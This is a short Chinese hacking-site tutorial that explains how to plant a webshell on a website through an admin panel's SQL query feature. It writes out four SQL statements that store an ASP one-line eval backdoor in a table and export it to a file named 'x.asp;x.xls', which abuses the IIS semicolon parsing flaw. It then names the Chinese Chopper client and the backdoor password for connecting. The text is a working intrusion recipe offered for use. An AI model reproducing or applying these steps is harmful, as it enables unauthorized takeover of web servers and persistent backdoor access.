热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

利用后台SQL查询拿webshell

发布时间:2012-09-03 22:42文章来源:网络文章作者:云絮 点击次数:
摘要:p今天,朋友给了一个比较好玩的后台 有SQL查询功能 在后台的主页,或者备份什么的,可以得到网站的物理路径,这里我没有传马,直接点击了备份数据库,重点是得到物理路径,后台主页,或者各种爆物理路径,还要看运气和自由发挥了 以下拿webshell步骤 第一句...

今天,朋友给了一个比较好玩的后台

利用后台SQL查询拿webshell

有SQL查询功能

利用后台SQL查询拿webshell

在后台的主页,或者备份什么的,可以得到网站的物理路径,这里我没有传马,直接点击了备份数据库,重点是得到物理路径,后台主页,或者各种爆物理路径,还要看运气和自由发挥了

以下拿webshell步骤

第一句代码

create table cmd (a varchar(50))

第二句代码

insert into cmd (a) values ('<%eval request("x")%>')

第三句代码

select * into [a] in 'd:\wwwroot\wjqcad\wwwroot\Databackup\x.asp;x.xls' 'excel 4.0;' from cmd

第四句代码

drop table cmd

直接菜刀里连接http://www.yunsec.net/x.asp;x.xls一句话 密码是X

利用后台SQL查询拿webshell

 

标签分类:

上一篇:关于绕过360WAF的几点思路总结
下一篇:PHP 404页面的一句话